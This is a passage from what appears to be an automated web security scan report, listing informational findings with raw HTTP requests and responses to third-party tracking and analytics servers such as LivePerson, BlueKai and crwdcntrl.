X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=8822472582692139368; path=/hc/43040610
Set-Cookie: HumanClickACTIVE=1298824317353; expires=Mon, 28-Feb-2011 16:31:57 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 27 Feb 2011 16:31:57 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1410

lpConnLib.Process({"ResultSet": {"lpCallId":"547932389657-441970258019","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'server.iad.liveper
...[SNIP]...

7.386. http://server.iad.liveperson.net/hc/43040610/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/43040610/

Request

GET /hc/43040610/?&site=43040610&cmd=mTagKnockPage&lpCallId=433447187766-83605480613&protV=20&lpjson=1&id=3497427995&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/domain-name-registration/domain-name-search-results.jsp?isExplicitSearchAvailable=true&dontShowCountrySearchLink=true
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8822472582692139368; LivePersonID=-44502044936234-1298824318:-1:-1:-1:-1; HumanClickSiteContainerID_43040610=STANDALONE; LivePersonID=LP i=44502044936234,d=1297806164; HumanClickACTIVE=1298824317353

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:35:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1298824541410; expires=Mon, 28-Feb-2011 16:35:41 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 27 Feb 2011 16:35:41 GMT
Set-Cookie: HumanClickSiteContainerID_43040610=STANDALONE; path=/hc/43040610
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1409

lpConnLib.Process({"ResultSet": {"lpCallId":"433447187766-83605480613","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'server.iad.livepers
...[SNIP]...

7.387. http://server.iad.liveperson.net/hc/43040610/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/43040610/

Request

GET /hc/43040610/?&site=43040610&cmd=mTagStartPage&lpCallId=37284447812-532055535120&protV=20&lpjson=1&page=http%3A//www.networksolutions.com/domain-name-registration/RV8.jsp%3Fsiteid%3D8%26channelid%3DP13C8S570N0B9A1D661E0000V104%26promo%3DRV699SALE3%26referID%3Dns_google_domains_tp%26k%3Ddomain%28%29%7BPhone-RV%7D%26adid%3D5954407096%26plid%3D%26gclid%3DCLqQ3K_hqKcCFc9w5QodUFfOCg%26clickid%3D1294340992&id=1720266903&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-Domain%20Sales&activePlugin=none&cobrowse=true&PV%21unit=Domain%20Sales&PV%21pageLoadTime=52%20sec&PV%21visitorActive=1&SV%21NSSessionID=7f54a2c886d230536bf4e8264959&SV%21RVTraffic=No&title=Domain%20Names%2C%20Web%20Hosting%20and%20Online%20Marketing%20Services%20%7C%20Network%20Solutions&cookie=JSESSIONID%3D7f54a2c886d230536bf4e8264959%3B%20JROUTE%3Dqevx%3B%20vrsnsf%3D7f54a2c886d230536bf4e8264959%3B%20landing%3DP13C8S570N0B9A1D661E0000V104%3B%20vertigo%3Dfalse%3B%20s_cc%3Dtrue%3B%20s_sq%3D%255B%255BB%255D%255D%3B%20__utmz%3D82970249.1298824276.1.1.utmgclid%3DCLqQ3K_hqKcCFc9w5QodUFfOCg%7Cutmccn%3D%28not%2520set%29%7Cutmcmd%3D%28not%2520set%29%3B%20__utmv%3D%3B%20__utma%3D82970249.1334409241.1298824276.1298824276.1298824276.1%3B%20__utmc%3D82970249%3B%20__utmb%3D82970249.1.10.1298824276%3B%20currency%3DUSD HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/domain-name-registration/RV8.jsp?siteid=8&channelid=P13C8S570N0B9A1D661E0000V104&promo=RV699SALE3&referID=ns_google_domains_tp&k=domain(){Phone-RV}&adid=5954407096&plid=&gclid=CLqQ3K_hqKcCFc9w5QodUFfOCg&clickid=1294340992
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8822472582692139368; LivePersonID=LP i=44502044936234,d=1297806164; HumanClickACTIVE=1298824317353

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:31:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-44502044936234-1298824318:0; expires=Mon, 27-Feb-2012 16:31:58 GMT; path=/hc/43040610; domain=.liveperson.net
Set-Cookie: HumanClickKEY=8822472582692139368; path=/hc/43040610
Set-Cookie: HumanClickSiteContainerID_43040610=STANDALONE; path=/hc/43040610
Set-Cookie: LivePersonID=-44502044936234-1298824318:-1:-1:-1:-1; expires=Mon, 27-Feb-2012 16:31:58 GMT; path=/hc/43040610; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 27 Feb 2011 16:31:58 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1997

lpConnLib.Process({"ResultSet": {"lpCallId":"37284447812-532055535120","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton(
...[SNIP]...

7.388. http://stats.cafepress.com/b/ss/cafepresscom/1/H.2-pdv-2/s34579009918961  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.cafepress.com
Path:   /b/ss/cafepresscom/1/H.2-pdv-2/s34579009918961

Request

GET /b/ss/cafepresscom/1/H.2-pdv-2/s34579009918961?[AQB]&ndh=1&t=27/1/2011%2017%3A42%3A26%200%20360&ce=UTF-8&ns=cafepress&pageName=duckduckgo%3A&g=http%3A//www.cafepress.com/duckduckgo&r=http%3A//duckduckgo.com/faq.html&cc=USD&ch=PremiumShop&c3=Visitor&v3=PremiumShop&c8=duckduckgo&v10=Visitor&v11=duckduckgo&v12=23001479&v14=PremiumShop&v15=duckduckgo%3A&v23=23001479&v24=EXP_08_00%3AC%2CEXP_08_07%3AC%2CEXP_09_10%3AT%2CEXP_09_20%3AC%2CEXP_10_08%3AT%2CEXP_10_12%3AC&v26=1999&v30=2D46510B1A13D0FFD53F3078385F5F72%3A216508906B470ADCE1723F300108488D&v34=duckduckgo&v35=Referral&v38=duckduckgo.com/faq.html&v39=http%3A//duckduckgo.com/faq.html&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1437&bh=954&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: stats.cafepress.com
Proxy-Connection: keep-alive
Referer: http://www.cafepress.com/duckduckgo
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cpvr=8ffd924c-ac46-4d67-a746-a756a45ebe93; cpv=7cd24b2a-54c5-4b3e-a48e-59a16bd68fb7; tfx_ltch=7%2cduckduckgo.com%2c20110227154210%2c; tfx_touch=7%2cduckduckgo.com%2c20110227154210%2c; cppid=1999; xid=0; jid=0; pid.guid=b4fe9865-eee3-4926-89ec-9fe3ef86c27e; cp-v=216508906B470ADCE1723F300108488D; cppss=0x1; ASP.NET_SessionId=yukwhc55nqkjhe55cavfqmmi; s_cc=true

Response

HTTP/1.1 302 Found
Date: Sun, 27 Feb 2011 23:42:11 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26B570A9851D00AD-400001416049625D[CE]; Expires=Fri, 26 Feb 2016 23:42:11 GMT; Domain=.cafepress.com; Path=/
Location: http://stats.cafepress.com/b/ss/cafepresscom/1/H.2-pdv-2/s34579009918961?AQB=1&pccr=true&vidn=26B570A9851D00AD-400001416049625D&&ndh=1&t=27/1/2011%2017%3A42%3A26%200%20360&ce=UTF-8&ns=cafepress&pageName=duckduckgo%3A&g=http%3A//www.cafepress.com/duckduckgo&r=http%3A//duckduckgo.com/faq.html&cc=USD&ch=PremiumShop&c3=Visitor&v3=PremiumShop&c8=duckduckgo&v10=Visitor&v11=duckduckgo&v12=23001479&v14=PremiumShop&v15=duckduckgo%3A&v23=23001479&v24=EXP_08_00%3AC%2CEXP_08_07%3AC%2CEXP_09_10%3AT%2CEXP_09_20%3AC%2CEXP_10_08%3AT%2CEXP_10_12%3AC&v26=1999&v30=2D46510B1A13D0FFD53F3078385F5F72%3A216508906B470ADCE1723F300108488D&v34=duckduckgo&v35=Referral&v38=duckduckgo.com/faq.html&v39=http%3A//duckduckgo.com/faq.html&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1437&bh=954&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Sat, 26 Feb 2011 23:42:11 GMT
Last-Modified: Mon, 28 Feb 2011 23:42:11 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www411
Content-Length: 0
Content-Type: text/plain


7.389. http://stats.manticoretechnology.com/Data/447/7993/AD0FEDA3-8777-48C4-97A7-A1999E9FA90D/mtcLogData.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.manticoretechnology.com
Path:   /Data/447/7993/AD0FEDA3-8777-48C4-97A7-A1999E9FA90D/mtcLogData.asp

Request

GET /Data/447/7993/AD0FEDA3-8777-48C4-97A7-A1999E9FA90D/mtcLogData.asp?ID=7993&Key=AD0FEDA3-8777-48C4-97A7-A1999E9FA90D&ra=1298762765054&pn=http%3A//www.paperthin.com/&rp=&sr=1920x1200&cd=16&tz=17&ci=1&je=1&cc=&sg=&ip=&pc=&pt=CommonSpot%20Web%20Content%20Management%20Solution%20-%20CMS%20-%20WCM%20-%20ColdFusion%20CMS%20-%20PaperThin%20Homepage&af=&jsv=1.7&on=&ii=&ea=&cp=&epci=&vd=L3%3A&o_pce=30&o_pcsl=0&ml=undefined HTTP/1.1
Host: stats.manticoretechnology.com
Proxy-Connection: keep-alive
Referer: http://www.paperthin.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:26:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" policyref="/w3c/p3p.xml"
Content-Length: 48
Content-Type: image/gif
Expires: Sun, 20 Feb 2011 00:46:45 GMT
Set-Cookie: MTC%5FSP=sf5nhBLvopLIi7sLm2H7eoSwHg8C9suic5OkDOCVHq4189vvuyISaf8FhdqGtN7dHyV0hrha9GqR%0D%0Ax5xviWzrkyrYAeaOv%2BbLM%2FWu56reluc9veJeOHrnnbNBlygRAzXYG0GoHdZaM7sgR8Fi8DBxIWJn%0D%0AeSnR5P12MDml5HYzxlR6dTDnHuLuwGEOopzwW%2FZGYCVWhtHHErsiXS%2BRAxH%2BFzVtqla2n3lGjsJy%0D%0AywJJdSVnqZDEjokvzTLnnfpzdmucQG%2FVCVKWpxVWXwtaFVyBHA%3D%3D; expires=Sun, 26-Feb-2012 23:26:44 GMT; path=/Data/447/7993/AD0FEDA3-8777-48C4-97A7-A1999E9FA90D/
Set-Cookie: MTC%5FLFCT=; expires=Fri, 25-Feb-2011 23:26:44 GMT; path=/
Set-Cookie: MTC%5FFORCEDNS=; expires=Fri, 25-Feb-2011 23:26:44 GMT; path=/
Cache-control: Private

GIF89a........)../...../.!.......,...........L.;

7.390. http://tacoda.at.atwola.com/rtx/r.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Request

GET /rtx/r.js?cmd=ADN&si=18288&pi=M&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/%2526cmmiss%253D-1%2526cmkw%253D&r=&v=5.5&cb=60711 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=53615^1^1299284361|52766^1^1299284361|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837; TData=99999|^|53575|53656|54063|56768|56830|56835|60506|60515|#|53615|52766|60130|50213|50239; N=2:2d4ec7443dfa469e64430537b01b46dc,ca3680f9be00bf67dd48c45e051ee302; ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTQwNjM6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MDY6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk=; eadx=1; CfP=1; JEB2=4D69B03E6E651A440C6EAF39F001EBEA

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 02:32:32 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 27 Feb 2011 02:47:32 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Wed, 22-Feb-12 02:32:32 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=53615^1^1299284361|52766^1^1299284361|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837|60190^1^1299378752; path=/; expires=Sun, 06-Mar-11 02:32:32 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1298773952^1298775752|18288^1298773952^1298775752; path=/; expires=Sun, 27-Feb-11 03:02:32 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239|60190; expires=Wed, 22-Feb-12 02:32:32 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Sun, 27-Feb-11 08:32:32 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:ca3680f9be00bf67dd48c45e051ee302,c638727a4faa7467533adb5623113b72; expires=Wed, 22-Feb-12 02:32:32 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk6NjAxOTA=; expires=Wed, 22-Feb-12 02:32:32 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 176
Content-Type: application/x-javascript
Content-Length: 176

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16lsqii1n1a3cr';
var ANSL='99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239|60190';
ANRTXR();


7.391. http://tags.bluekai.com/site/918  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/918

Request

GET /site/918?ret=html&phint=fa%3Dit&phint=sen%3Dexec&phint=ind%3Dbusinessservices&limit=2&r=88683996 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://js.bizographics.com/support/partner.html?pid=221&u=fa:it,sen:exec,ind:businessservices,slots:2
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99W4pVANemJaB; bko=KJ0fyXF9ymZKTzFv1/AByrJQAmHMRcYyEwHkRjYaL+QRP/c3K/Y0q9y96QGcQy==; bkst=KJy5pgav96WxOr9o9QWFyzJuusVfLeLpKf+qHMAEYsFCVPQo+l+lYRZzvvCQnjnshd9jfc6YcXamuhdOpD6Ndwdc19wTl91T9k7gHgsgHzOvYojmi3YhWqZEZClcta9XozGwTYF8/Eh6ZIft34+jUbUGn6DcxvC0hX0A7BWZNXqRMffKp0eBb2+r2NkwiSHhuiqYhaRCbZN4FtufjfMV9zAGxxb+1JDkQ5ysDVLA+vlmAzBF4dG2ID1TZHjkD5MtzqbTnezIcaXFfLbKNh5Gk3wjvgcJss9WL8rTrF5C37h8dCtedyKnaEyt; bkw5=KJhNpE6vyA9xCraFBNsEZ/ORVBCjvaQo1DD6IJ1D9qt9of9xWu02Q/iBKCogMt1HgJNkOh/kBgFewryf+xs95QicgMgi9OYy7zzBb/j9RG4/CcGfH/eWNUiBxSzN94gA3KlMYKUfuwI1MXYxaBOuPuwJtp6c9CLklJH/8Ao6qPLx9tLV+V6NpVLZNpnlHnUZnJ4vN88VxuHnyfrEfWQLagl4j0IV6hnH8VVJuYdgYUxVBJ+k+z+4szVdBzANfHIjA027; bklc=4d69b468; bk=anV393SI5QJh4f95; bkc=KJh56e2nxpWDO4YEwostfyZ5cJlu4Qsn+OUWnMoNfIeuvrMinATazU9xa4cwaIMAt1NOoJFT9PhNvYTme3Vp2NHrUtbsWcfA8C0uRx36iQfjfkcc9Hivs8clkgey4xvz+GYur/ePjqGRIq5owRkXLta2cjk2bZ1oExq92N5dlAdpUntt97ugeodfrU231mSXI3A1MWq9SIeBztFm3y+04Njptsftao8sdFeVfxLR16X20tE5m4M9PlUg5tdBFBe1D6dabSlez0Blm4Jkl4gBVp1dBwwPRdZwq9pLgm4Ku368gbf/KhIkffeub0xTZUFig5AUZF4PJzkfK4QlXIie1IFtyJ3fIQ27DlS5; bkdc=res

Response

HTTP/1.0 200 OK
Date: Sun, 27 Feb 2011 02:20:57 GMT
Set-Cookie: bklc=4d69b509; expires=Tue, 01-Mar-2011 02:20:57 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=tnbNpnN6YGah4f95; expires=Fri, 26-Aug-2011 02:20:57 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56qNv96WDOK9pgAiuUus+M5VSapO/BGvRH3F6aMjHXSKyabr9Vai/iCC29uFnRs1CAA8X9aL+QGtaw0aRKG20Llm7ZOAI8Lb8pWy79gTlQKn+E+1Ob/id97XsdLZL2IFi8KNZCvAJrCeT/fwrOpbqLpTBFe3KIpGsbQVcH1pI5Y6yb2Vf1AP+TmNNqVEr3bz7QjDjC84NlmXPsnBK4P1YrklQy4wXGEUgNVB04kChV1hS/yXYwb4VMu1R16X2EsHzmvuKEbgVEbANXlypEp6xhIzm5fUzozecPKFcNJg8FoZFfLkfJeNQSEqlxZpBK7Pjf7Lkdqqvn47FFEdlDtFtXXlpb3nAlPdIZl76hGaNGtlBP46n87bWvQ==; expires=Fri, 26-Aug-2011 02:20:57 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJhE8VPQTB0SbzFaz94WzLdyjVVRh9jCzEO/XMWymaQZIg/y0WJjq9y9tHRcXy==; expires=Fri, 26-Aug-2011 02:20:57 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJhNpfNv96WDCralJ7IfzxBiRVa7GV9PMuAthCQlHRMKQain5G/iQGVaB0OiGNbB+jzE5jsD77smfWEVjZSRCdBhFARqVWko0gP9NQPelch2CgDDH7avq+p4EHXLE8PoepZM7PdFOV8Wjr/q/rmTyhFrffgF1f1ftJx8XaJlE8sF8vagmcsiSxlSx8dt4QS7Q5ERDFAxm4XHFbakomJtryCZbC0g41g1jEOETDMa+qGBjZ/ZybvwlRDGXU/TvOoD+DsKlWreoqNYS7w5kQmhvGr+a8WgADMaf22He8wcJKvEe6gW+FJNyI3IFv+kSRdd07qtBXN3ZF5FmJHsqx==; expires=Fri, 26-Aug-2011 02:20:57 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Mon, 28-Feb-2011 02:20:57 GMT; path=/; domain=.bluekai.com
BK-Server: 1c6d
Content-Length: 77
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">

</div>

</body>
</html>

7.392. http://tags.crwdcntrl.net/5/c=244/b=2252612  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /5/c=244/b=2252612

Request

GET /5/c=244/b=2252612 HTTP/1.1
Host: tags.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/register
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwjes%2FyMDAqGeZ2HWSQY6BQUCJAQx6wSTPZTAl%2BBVM8TKDKaE2iNxNiKA0hMcHprgegyn%2Bv2BKmANMsfGCKQ4jiKBZA0MDAwOfKJgncBwiWA0WFHoG0e4GsTYCYl8xhCoBU6IQw3jegzXw%2FoMIQhwtANHAawpxiz%2BQAACz%2FhXc; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW9c%2F8H%2F%2F2%2BtYGBg1LNM7DoJEmNgdZZVYmJgkGRg%2BM%2FIwPDlfxqQAjI4hLZaMsKEgQxmpaSZyPLMSvFeYH4qhM8otGkHSP3%2F31A%2BA4dMnTq6wVytkzCE6hvQhTgfL0cX4k7YhSm0E12Ir%2BItupCs2UV0IQBB%2BlIK

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 02:19:55 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:19:55 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:19:55 GMT; Path=/
Set-Cookie: OAID=6f898f9e37a5ffbfb8f8475e2a918987; Domain=.crwdcntrl.net; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

7.393. http://tags.crwdcntrl.net/5/c=244/b=2252618  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /5/c=244/b=2252618

Request

GET /5/c=244/b=2252618 HTTP/1.1
Host: tags.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/register
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwjes%2FyMDAqGeZ2HWSQY6BQUCJAQx6wSTPZTAl%2BBVM8TKDKaE2iNxNiKA0hMcHprgegyn%2Bv2BKmANMsfGCKQ4jiKBZA0MDAwOfKJgncBwiWA0WFHoG0e4GsTYCYl8xhCoBU6IQw3jegzXw%2FoMIQhwtANHAawpxiz%2BQAACz%2FhXc; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW9c%2F8H%2F%2F2%2BtYGBg1LNM7DoJEmNgdZZVYmJgkGRg%2BM%2FIwPDlfxqQAjI4hLZaMsKEgQxmpaSZyPLMSvFeYH4qhM8otGkHSP3%2F31A%2BA4dMnTq6wVytkzCE6hvQhTgfL0cX4k7YhSm0E12Ir%2BItupCs2UV0IQBB%2BlIK

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 02:19:55 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldUpBhkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WCXvP4jtphBTICq5%2FIEUAOaTJn8%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:19:55 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuoUSIyB1VlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIr3QhNiVEqaCRUC85mFtloywjSD%2BZt2gPl5ED4jA4dMnTq68VytkzCE6hvQhTgfL0cX4k7YhSm0E12Ir%2BItupCs2UV0IQBqOFF%2B; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:19:55 GMT; Path=/
Set-Cookie: OAID=6f898f9e37a5ffbfb8f8475e2a918987; Domain=.crwdcntrl.net; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

7.394. http://tags.crwdcntrl.net/5/c=244/b=2253465  previous  next

Summary

